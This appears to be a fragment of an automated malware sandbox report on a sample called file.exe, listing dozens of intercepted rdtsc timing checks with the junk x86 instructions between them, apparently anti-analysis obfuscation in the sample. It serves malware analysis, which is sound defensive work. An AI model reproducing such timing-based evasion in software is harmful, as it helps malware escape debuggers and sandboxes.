Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA5892 second address: BA5898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA903 second address: BAA907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA907 second address: BAA90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAD4E second address: BAAD8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FC3A8C81766h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FC3A8C81775h 0x00000016 jmp 00007FC3A8C81774h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B574BC second address: B574C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAB162 second address: BAB166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAF4A3 second address: BAF4BA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3A8C83B36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jbe 00007FC3A8C83B65h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAF4BA second address: BAF4C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3A8C81766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2C98 second address: BB2CAC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC3A8C83B36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FC3A8C83B3Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2CAC second address: BB2CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2CB6 second address: BB2CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B40h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2CCA second address: BB2CD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9BB7 second address: BB9BC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007FC3A8C83B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9BC3 second address: BB9BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9BCB second address: BB9BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBA112 second address: BBA138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C8176Ch 0x00000009 jmp 00007FC3A8C8176Ah 0x0000000e popad 0x0000000f jmp 00007FC3A8C8176Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBA138 second address: BBA140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBAE47 second address: BBAE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBB10C second address: BBB112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF810 second address: BBF81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF81A second address: BBF83D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B49h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF83D second address: BBF841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBE9CB second address: BBE9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBE9E0 second address: BBE9E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBE9E4 second address: BBE9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FC3A8C83B3Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBE9F8 second address: BBEA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jnl 00007FC3A8C81766h 0x0000000b jo 00007FC3A8C81766h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEB6E second address: BBEB96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B40h 0x00000009 jmp 00007FC3A8C83B44h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF0D7 second address: BBF0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF0DB second address: BBF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF0E1 second address: BBF0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C8176Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF0F0 second address: BBF0F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF25E second address: BBF262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF262 second address: BBF266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF266 second address: BBF26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF26C second address: BBF275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF398 second address: BBF39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF39E second address: BBF3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF527 second address: BBF52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF52B second address: BBF531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF531 second address: BBF537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB50D second address: BCB539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B44h 0x00000009 jmp 00007FC3A8C83B3Bh 0x0000000e popad 0x0000000f jo 00007FC3A8C83B3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB664 second address: BCB678 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC3A8C8176Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB678 second address: BCB696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B48h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB951 second address: BCB955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB955 second address: BCB964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC3A8C83B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCBAAC second address: BCBAF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Dh 0x00000007 jp 00007FC3A8C81766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FC3A8C81774h 0x00000015 jbe 00007FC3A8C81766h 0x0000001b popad 0x0000001c pop edx 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007FC3A8C8176Dh 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCBAF3 second address: BCBAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCBAF9 second address: BCBB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FC3A8C81766h 0x0000000d jc 00007FC3A8C81766h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD237 second address: BCD298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jp 00007FC3A8C83B36h 0x0000000d pop esi 0x0000000e jns 00007FC3A8C83B42h 0x00000014 push eax 0x00000015 jl 00007FC3A8C83B36h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 jno 00007FC3A8C83B51h 0x00000026 je 00007FC3A8C83B3Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5FE6 second address: BD5FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5FEA second address: BD5FFF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3A8C83B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007FC3A8C83B36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5FFF second address: BD6005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6005 second address: BD600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD600D second address: BD6012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5A66 second address: BD5A77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC3A8C83B3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5BA1 second address: BD5BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5BA5 second address: BD5BBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3A8C83B3Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD5BBA second address: BD5BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE30F2 second address: BE3110 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC3A8C83B44h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2B2D second address: BE2B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C81772h 0x00000009 popad 0x0000000a jmp 00007FC3A8C81775h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2B5D second address: BE2B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5119 second address: BF511D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF511D second address: BF512F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC3A8C83B3Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF512F second address: BF5139 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5139 second address: BF514D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC3A8C83B3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF514D second address: BF5153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5153 second address: BF516A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3A8C83B3Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B1B second address: BF8B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B1F second address: BF8B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFE5B2 second address: BFE5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFE5BA second address: BFE5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC3A8C83B36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFCF21 second address: BFCF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC3A8C8176Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD4C2 second address: BFD4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD7A3 second address: BFD7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD7AF second address: BFD7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD92E second address: BFD938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD938 second address: BFD93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10D01 second address: C10D06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12781 second address: C12785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12785 second address: C1278F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C125EE second address: C125F8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC3A8C83B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C125F8 second address: C12602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E30E second address: C0E312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1F909 second address: C1F929 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FC3A8C81766h 0x00000009 jmp 00007FC3A8C81773h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C352F3 second address: C35326 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007FC3A8C83B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FC3A8C83B3Ch 0x00000012 jnc 00007FC3A8C83B36h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC3A8C83B47h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3545A second address: C35464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C358AA second address: C358B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3A8C83B38h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C358B7 second address: C358BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C358BC second address: C358CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jne 00007FC3A8C83B36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C35B7E second address: C35BA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC3A8C81775h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C35E4E second address: C35E63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Ah 0x00000007 pushad 0x00000008 jo 00007FC3A8C83B36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C35E63 second address: C35E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38A79 second address: C38A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38C6F second address: C38C75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38D3A second address: C38D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BA6A second address: C3BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC3A8C81768h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B602B8 second address: 4B602BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B602BE second address: 4B602C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60340 second address: 4B60353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60353 second address: 4B60391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC3A8C8176Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC3A8C8176Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60391 second address: 4B60397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60397 second address: 4B603AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C81773h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B603FB second address: 4B603FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B603FF second address: 4B60405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
